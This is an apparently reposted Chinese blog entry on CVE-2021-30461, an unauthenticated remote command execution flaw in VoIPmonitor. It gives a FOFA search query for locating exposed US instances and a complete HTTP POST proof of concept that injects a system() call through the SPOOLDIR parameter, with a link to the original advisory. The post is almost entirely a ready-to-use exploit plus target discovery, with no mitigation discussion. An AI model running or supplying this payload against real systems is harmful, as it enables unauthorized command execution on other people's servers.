（CVE-2021-30461）VoIPmonitor UnAuth远程命令执行

时间：2021-05-20 15:28:14 阅读：34 评论：0 收藏：0 [点我收藏+]

FOFa

title="VoIPmonitor" && country="US"

漏洞界面长这样
技术分享图片

POC

POST /index.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,vi;q=0.8,id;q=0.7,ja;q=0.6,zh-TW;q=0.5
Connection: close
Content-Length: 37

SPOOLDIR=test%22.system%28id%29.%22

技术分享图片

参考链接

https://ssd-disclosure.com/ssd-advisory-voipmonitor-unauth-rce/

（CVE-2021-30461）VoIPmonitor UnAuth远程命令执行

原文：https://www.cnblogs.com/KHZ521/p/14788689.html

踩

(0)

评论一句话评论（0）

分享档案

更多>

2021年09月23日 (328)
2021年09月24日 (313)
2021年09月17日 (191)
2021年09月15日 (369)
2021年09月16日 (411)
2021年09月13日 (439)
2021年09月11日 (398)
2021年09月12日 (393)
2021年09月10日 (160)
2021年09月08日 (222)